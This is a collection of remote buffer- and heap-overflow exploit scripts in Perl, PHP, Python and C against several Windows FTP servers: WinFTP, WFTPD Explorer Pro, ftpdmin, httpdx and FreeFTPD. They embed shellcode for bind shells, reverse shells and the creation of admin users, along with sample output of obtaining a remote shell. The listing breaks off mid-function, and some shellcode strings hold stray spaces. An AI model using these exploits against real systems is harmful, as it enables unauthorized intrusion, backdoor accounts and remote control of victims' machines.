# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
# C:\Program Files\WinFTP Server> #
# #
################################################## ##############################
#
# Quick description of the exploit:
#
# There is a post-auth bug in WFTPSRV.exe (2.3.0), in the handling of the LIST
# command. This appears to be different from the previous vuln found in
# the handling of the NLIST command. Providing the server with
# "LIST *<long string here>" results in an arbitrary memory overwrite
# vulnerability. Note that simply giving LIST a long string won't trigger
# the vuln. At least in my testing, the asterisk was necessary to force
# WFTPSRV.exe to process the long string, which clobbers various stored
# addresses, providing an opportunity for an arbitrary DWORD overwrite.
# So exploitation goes like this:
#
# format string vuln -> overflow -> arbitrary memory overwrite -> EIP control
#
# On Win2k, the error is:
# "The instruction at 0x77fc9906 referenced memory at
# 0x88776655. The memory could not be "written".
#
# Which is what we want to see in order to control an arbitrary DWORD.
# At this point our registers look like:
#
# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
#
# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
#
# Under normal conditions EDX and ECX contain pointers located
# in the data segment. However, after exploitation we control
# EDX (where to write), and ECX (what to write). From here,
# we load EDX with (almost) any old return address on our stack,
# and ECX with a pointer to our shellcode.
#
# Note: This is *not* a predictable vuln. I noticed even changing
# the filename of the binary causes the offsets to change.
# Please experiment on your own. Let me know if you manage to
# get it working under WinXP SP2.
# [email protected]
use IO::Socket;
if (@ARGV < 2) {
print "\nUsage: $0 <host> <username> <password> <target>\n\n";
print "Target: 1 -> Win2k\n";
print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n";
exit;
};
$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;
$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);
die "Connection failed: $!\n\n" unless $sock;
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter.
$address2k = "\x74\xf8\x74\x02". # <- This needs to contain any
# readable address, or we
# immediately cause an exception.
"\x14\xfc\x75\x02". # <- This will become EIP. It points
# to our shellcode.
"\x74\xf8\x75\x02"; # <- This specifies what DWORD to overwrite.
# YMMV here. I picked an arbitrary
# return address on the stack located
# near where ESP was during
# the exception. On my system this
# is:
#
# 0275F874 73D34154 RETURN to MFC42.73D34154
$nopsled = "\x90" x 2228;
# Metasploit win32_bind, EXITFUNC=process LPORT=7777
$shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\x f8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\x 68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\x fe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\x 2b\xc6\xcd\xfb".
"\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\xa2\x58\x 4f\x8e\xe8\x38".
"\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\x32\xb7\x 9b\xd1\xd9\x58".
"\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\x81\x5d\x 5e\x9c\x05\x83".
"\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\x9a\xe1\x 4f\xc6\x16\x03".
"\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\x0c\xb5\x 91\x7f\xe1\xd1".
"\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\x3f\xbe\x2c\x c6\xc1\xba\x80".
"\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\xfa\xf7\xb2\x 76\xc1\x60\x32".
"\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\xf8\xf9\x82\x 45\x6d\x39\xbb".
"\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\x6d\x39\xbb\x f5\xdb\x6f\x9a".
"\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\x01\x81\x34\x 69\x54\x90\x84".
"\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\xfa\x8a\xbe\x 99\x77\x83\x83".
"\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\xa3\x29\x20\x ba\x6c\xab\xfe".
"\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\x39\x81\xa1\x ee\x21\xff\x2c".
"\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\xc3\x83\xd2\x 41\xc3\xbc\x82".
"\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\x44\x83\x2c\x ef\xa5\x16\x03".
"\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\x6d\x39\xbb\x e0\x18\xed\x8c".
"\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a";
if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
print "\n[=] Connected.\n";
sleep 1;
print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;
print "[=] Sending $pass_string";
$sock->send($pass_string);
sleep 1;
$sock->send($port_string);
sleep 1;
print "[=] Sending payload...\n";
$sock->send($payload);
sleep 1;
if ($ARGV[3] == '1')
{
print "[=] Done. You should have a command shell on port 7777.\n\n";
}
elsif ($ARGV[3] == '2')
{
print "[=] Done. WinFTP should be crashed on the remote host.\n\n";
}
else
{
print "[=] Done.\n\n";
}
# [2009-01-26]
21 WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit
#!/usr/bin/perl
#
# WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit
# ---------------------------------------------------
# Exploit by SkD ([email protected])
#
# This is a remote heap overflow exploit for
# WFTPD Explorer Pro 1.0 by Texas Imperial Software.
# (Vendors website = http://www.wftpd.com)
#
# Tested on Windows 2000 SP4.
#
# I haven't used the more common methods of overwritting
# PEB or UEF as it seemed both of them were not called
# when the heap was overflowed, probably due to clean
# clear ups when the overflow is detected. So I chose
# to overwrite a local SEH handler address. I have tested
# it numerously and the success rate is 100% in Win2k Sp4.
# The exploit is basically based on the PoC by r4x
# and it recreates the scenario but also exploits it by
# creating two sockets, which the vital point is the
# data socket.
#
# Enjoy it ladies & gents.
#
# Greets fly out to InTeL & str0ke.
#
# Note: Author has no responsibility over the damage you do
# with this!
use IO::Socket;
use warnings;
use strict;
print "[x] WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n";
my @requests =
("USER", "PASS", "TYPE", "PWD", "PASV", "LIST");
my @response =
("331 Password required.\r\n", "230 User logged in.\r\n", "200 Type set to I.\r\n",
"257 '/' is current directory.\r\n", "227 Entering Passive Mode (127,0,0,1,100,100).\r\n",
"150 Opening ASCII mode data connection for file list.\r\n");
# win32_exec - EXITFUNC=thread CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x34\x4e\x43\x 4b\x38\x4e\x47".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48".
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x 46\x43\x4b\x58".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x30\x45\x47\x 45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x 4e\x31\x4b\x48".
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x52\x46\x50\x 43\x4c\x41\x43".
"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x43\x45\x38\x 42\x4c\x4a\x47".
"\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x 4e\x31\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x 42\x38\x42\x4b".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x 4f\x45\x41\x33".
"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x38\x 42\x4c\x4b\x47".
"\x42\x45\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x 4a\x36\x4a\x59".
"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x 43\x36\x41\x36".
"\x4e\x36\x43\x56\x42\x30\x5a";
my $heapend = #The heap sometimes needs to be fed (end) with strange bytes ;)
"\x83\xc5\x7a\x83\xc5\x7a\x8b\x45\x00\xbd\x68\xc3\x d3\x55\xa7\x86". #No specific instructions
"\xb9\x42\x42\x42\x42\x40\x40\x40\x40\x39\x08\x75\x f8\xff\xe0\x2f". #No specific instructions
"\xef\xde\x50\xc6\xab\x54\xc3\x48\x9c\x4d\xa7\x9c\x f3\x54\xc7\x8a". #No specific instructions
"\x58\x61\xa7\xc2\x3d\x64\xec\x5a\x7f\xd1\xec\xb7\x d4\x94\xe6\xce". #No specific instructions
"\xd2\x97\xc7\x37\xe8\x01\x08\xc7\xa6\xb0\xa7\x9c\x f7\x54\xc7\xa5". #No specific instructions
"\x58\x59\x67\x48\x8c\x49\x2d\x28\x58\x49\xa7\xc2\x 38\xdc\x70\xe7". #No specific instructions
"\xd7\x96\x1d\x03\xb7\xde\x6c\xf3\x56\x95\x54\xcf\x 58\x15\x20\x48". #No specific instructions
"\xa3\x49\x81\x48\xbb\x5d\xc7\xca\x58\xd5\x9c\xc3\x d3\x55\xa7\xab". #No specific instructions
"\xef\x0a\x1d\x35\xb3\x03\xa5\x3b\x50\x95\x57\x93\x bb\xba\xe2\x23". #No specific instructions
"\xb3\x3d\xb4\x3d\x59\x5b\x7b\x3c\x34\x36\x4d\xaf\x b0\x55\x2c\xc3"; #No specific instructions
my $overflow1 = "\x41" x (1024 - length($shellcode));
my $overflow2 = "\x42" x 144;
my $overwriteaddr = "\x18\xfe\x91\x00"; #SEH Handler Address, will be called after a deliberate exception
my $shellcodeaddr = "\xd0\x7a\xd3\x00"; #Address of a huge sled of 0x41 bytes that will lead to the shellcode
my $heappart = "\x41" x 6 ."\xEB\x08".$shellcodeaddr.$overwriteaddr."\x41" x 6 ."\xEB\x08"; #JMPs here are used in some cases
my $payload = $overflow1.$shellcode.$heappart.$shellcodeaddr.$ov erwriteaddr.
$heapend.$overflow2."\r\n"; #Heap overflow packet payload ;)
while(1)
{
my $sock1=new IO::Socket::INET(Listen=>1,LocalAddr => "127.0.0.1",LocalPort=>21,Proto=>'tcp');
my $sock2=new IO::Socket::INET(Listen=>1,LocalAddr => "127.0.0.1",LocalPort=>25700,Proto=>'tcp');
die unless $sock1;
die unless $sock2;
print "[x] Waiting for clients ...\n";
my $s1;
my $s2;
while($s1=$sock1->accept()){
print "\t[x] Got a client !\n";
print $s1 "220 Welcome to SkD FTPDAEMON\r\n";
while(my $request = <$s1>){
my @arr = split("\x20", $request);
print "\t\t[x] Request = ".$arr[0]."\n";
if(length($arr[0]) == 0){
print $s1 "502 Command not implemented.\r\n";
sleep(0.25);
} elsif($arr[0] eq $requests[0]){
print $s1 $response[0];
sleep(0.25);
} elsif($arr[0] eq $requests[1]){
print $s1 $response[1];
sleep(0.25);
} elsif($arr[0] eq $requests[2]){
print $s1 $response[2];
sleep(0.25);
} elsif($arr[0] eq $requests[3]){
print $s1 $response[3];
sleep(0.25);
} elsif($arr[0] eq $requests[4]){
print $s1 $response[4];
sleep(0.25);
$s2 = $sock2->accept();
print "\t\t[x] Data socket connected!\n";
} elsif($arr[0] eq $requests[5]){
print "\t\t[x] Sending exploit ;)!\n";
print $s1 $response[5];
sleep(1);
print $s2 $payload;
sleep(1);
print "\t[x] Exploitation done.\n";
last;
}
}
print "\t[x] Client disconnected.\n";
close $sock1; #Clean up socket1
close $sock2; #Clean up socket2
last;
}
}
# [2009-01-29]
21 ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)
<?php
/*
ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
by Nine:Situations:Group::surfista
software site: http://www.sentex.net/~mwandel/ftpdmin/
our site: http://retrogod.altervista.org/
bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to
the second memory region.
We have a very small set of chars that we can use ,RNFR (Rename From) command
accept pathnames as argument, so characters whose integer representations are
in the range from zero through 31 and reserved chars are not allowed!
*/
error_reporting(7);
$ftp_server = "192.168.0.1";
$ftp_user = "anonymous";
$ftp_pass = "[email protected]";
function ftp_cmd($cmd){
global $conn_id;
echo "-> ".$cmd."\n";
$buff=ftp_raw($conn_id,$cmd);
}
#WinExec shellcode of mine, enconded with the alpha2 tool by SkyLined, adds
#a "surfista" admin user with pass "pass"
#contains hardcoded address, re-encode command:
#alpha2 esp < shdmp.txt
$____scode="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABu JI".
"Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9o kOe3BMrD5pTocS5".
"prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTos qctRdWPGVa6epPN".
"w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44 BOT2T3UpfOw1qTw".
"4gPqcpupr3VQybSrTE1kOA";
#do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space
$____code ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABu JI".
"NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsU GPpipdUpesVVA";
if (strlen($____scode) > 272) {die("[!] shellcode too large!");}
$conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server");
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo "(*) Connected as $ftp_user@$ftp_server\n";
} else {
die("(!) Unable to connect as $ftp_user\n");
}
$____jnk = str_repeat("\x66",272 - strlen($____scode));
$____eip="\x44\x3a\x41\x7e"; //0x7E413A44 jmp esp, user32.dll xp sp3
$____jnk_ii = str_repeat("\x66",119 - strlen($____code));
$____bof=$____scode.$____jnk.$____eip.$____code.$_ ___jnk_ii;
$____boom="RNFR ".str_repeat("x",0x0096);
ftp_cmd($____boom);
$____boom="RNFR ".$____bof;
ftp_cmd($____boom);
$____boom="RNFR ".str_repeat("x",0x0208);
ftp_cmd($____boom);
ftp_close($conn_id);
echo "(*) Done !\n";
?>
# [2009-04-13]
21 httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)
#!/usr/bin/python
# Usage : httpdx.py [target_ip]
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
# Bug : httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)
# Founder : sico2819
# Tested on : Xp sp3 (EN)(VB)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
# Serra7 Merra7 koulchi mderra7 :p
#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.
import socket
import sys
host = sys.argv[1]
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x45\x34\x4e\x33\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x 4a\x41\x4b\x58"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x57\x 45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x38\x 4e\x50\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x 4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x 43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x43\x45\x38\x 42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x47\x 4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x 42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x43\x 4f\x35\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x38\x 42\x4c\x4b\x57"
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x 4a\x56\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x 43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x30\x5a")
payload = shellcode
payload += '\x41'*(877 - len(shellcode))
payload += '\xE9\x8E\xFC\xFF\xFF'
payload += '\x90'*48
payload += '\x74\xC9\x90\x90'
payload += '\x87\x23\x02\x10'
payload += '\x44'*9000
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,21))
s.recv(1024)
s.send('USER '+payload+'\r\n')
raw_input("[+] Done, press enter to quit")
s.close()
# [2009-05-18]
21 httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
#!/usr/bin/python
# Usage : httpdx_cwd.py [target_ip] user pass
# Example : httpdx_cwd.py 192.168.1.3 ftp 123
# Stack encouraged me to exploit this bug , so thx brotha
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
# Bug : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
# Refer : sico2819
# Tested on : Xp sp3 (EN)(VB)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
# Serra7 Merra7 koulchi mderra7 :p
#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.
import socket,sys,struct
def banner():
print "\nhttpdx <= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.\n"
print "By: His0k4\n"
if len(sys.argv)!=4:
banner()
print "Usage: %s <ip> <user> <pass>" %sys.argv[0]
sys.exit(0)
# skape's egghunter shellcode
shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x 3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x 75\xe7\xff\xe7")
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\x cd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\x eb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x 7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\x eb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x 3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x 5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x 61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x 6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x 65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x 8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x 6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x 44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x 62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x 71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
payload = '\x41'*26
payload += shellunt
payload += '\xEB\xDE\x90\x90'
payload += '\x87\x23\x02\x10'
payload += '\x44'*900
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((sys.argv[1],21))
except:
print "Can\'t connect to server!\n"
sys.exit(0)
s.recv(1024)
s.send('USER '+sys.argv[2]+'\r\n')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'\r\n')
s.recv(1024)
s.send('MKD '+shellcode+'\r\n') # i placed the shellcode in the MKD command ;)
s.recv(1024)
s.send('CWD '+payload+'\r\n')
print ("Egghunter is hunting...;)")
raw_input("[+] Shellcode will be executed when httpdx get closed")
s.close()
# [2009-05-19]
FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 26\09\05 \/ |__| \/ \/
[i] Title: FreeFTPD Remote USER Buffer overflow
[i] Discovered by: barabas [mutsonline]
[i] Exploit by: Expanders
[ Why FTPD crash? ]
When logging option is enabled freeftpd copy the user and the pass supplied by the user in the memory before put it in a logfile.
----Code Snippet----
78001D5D MOV ECX,DWORD PTR SS:[ESP+4] Ftpd put in ECX SP+4 that point to the user supplied data.
--------------------
If attacker's username is too big for the size of the buffer first we go to overwrite SEH handler(1011 bytes) and then the stack itself.
Beacuse stack point to our buffer this code
----Code Snippet----
78001D90 MOV EAX,DWORD PTR DS:[ECX]
--------------------
will cause an access violation.
Code Execution is possible.
[ Timeline ]
This vulnerability was not comunicated to the author.
[ Links ]
www.x0n3-h4ck.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define BUGSTR "USER %s \r\nPASS x0ned\r\n" // Command where bug reside
#define BUFFSIZE 2000 // Buffer size
int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );
/* win32_reverse - EXITFUNC=seh LHOST=0.0.0.0 LPORT=0 Size=312 Encoder=Pex http://metasploit.com */
char shellcode[] =
"\x2b\xc9\x83\xe9\xb8\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\xcf"
"\xfd\x4a\x2d\x83\xee\xfc\xe2\xf4\x33\x97\xa1\x60\x 27\x04\xb5\xd2"
"\x30\x9d\xc1\x41\xeb\xd9\xc1\x68\xf3\x76\x36\x28\x b7\xfc\xa5\xa6"
"\x80\xe5\xc1\x72\xef\xfc\xa1\x64\x44\xc9\xc1\x2c\x 21\xcc\x8a\xb4"
"\x63\x79\x8a\x59\xc8\x3c\x80\x20\xce\x3f\xa1\xd9\x f4\xa9\x6e\x05"
"\xba\x18\xc1\x72\xeb\xfc\xa1\x4b\x44\xf1\x01\xa6\x 90\xe1\x4b\xc6"
"\xcc\xd1\xc1\xa4\xa3\xd9\x56\x4c\x0c\xcc\x91\x49\x 44\xbe\x7a\xa6"
"\x8f\xf1\xc1\x5d\xd3\x50\xc1\x6d\xc7\xa3\x22\xa3\x 81\xf3\xa6\x7d"
"\x30\x2b\x2c\x7e\xa9\x95\x79\x1f\xa7\x8a\x39\x1f\x 90\xa9\xb5\xfd"
"\xa7\x36\xa7\xd1\xf4\xad\xb5\xfb\x90\x74\xaf\x4b\x 4e\x10\x42\x2f"
"\x9a\x97\x48\xd2\x1f\x95\x93\x24\x3a\x50\x1d\xd2\x 19\xae\x19\x7e"
"\x9c\xbe\x19\x6e\x9c\x02\x9a\x45"
"\x00\x00\x00\x00" // IP
"\xa9\x95"
"\x00\x00" // PORT
"\xa9\xae\xc3\xcc\x5a\x95\xa6\xd4\x65\x9d\x1d\xd2\x 19\x97\x5a\x7c"
"\x9a\x02\x9a\x4b\xa5\x99\x2c\x45\xac\x90\x20\x7d\x 96\xd4\x86\xa4"
"\x28\x97\x0e\xa4\x2d\xcc\x8a\xde\x65\x68\xc3\xd0\x 31\xbf\x67\xd3"
"\x8d\xd1\xc7\x57\xf7\x56\xe1\x86\xa7\x8f\xb4\x9e\x d9\x02\x3f\x05"
"\x30\x2b\x11\x7a\x9d\xac\x1b\x7c\xa5\xfc\x1b\x7c\x 9a\xac\xb5\xfd"
"\xa7\x50\x93\x28\x01\xae\xb5\xfb\xa5\x02\xb5\x1a\x 30\x2d\x22\xca"
"\xb6\x3b\x33\xd2\xba\xf9\xb5\xfb\x30\x8a\xb6\xd2\x 1f\x95\xba\xa7"
"\xcb\xa2\x19\xd2\x19\x02\x9a\x2d";
char jmpback[]=
//22 byte xor decoder (0x55)
"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x 43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
//(20 byte jump-back code -> springt 256 + 256 + 64 bytes terug)
"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x 98\xAB\x98\xD5\xBC\x15\xAA\xB4";
char jmpover[]=
// 2 bytes jump 4 bytes over - 2 bytes NOP
"\xEb\x04\x90\x90";
struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit]
{ "Windows 2k Universal", 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit]
{ "Windows XP SP 1/2" , 0x71aa13d6 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit]
{ NULL }
};
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
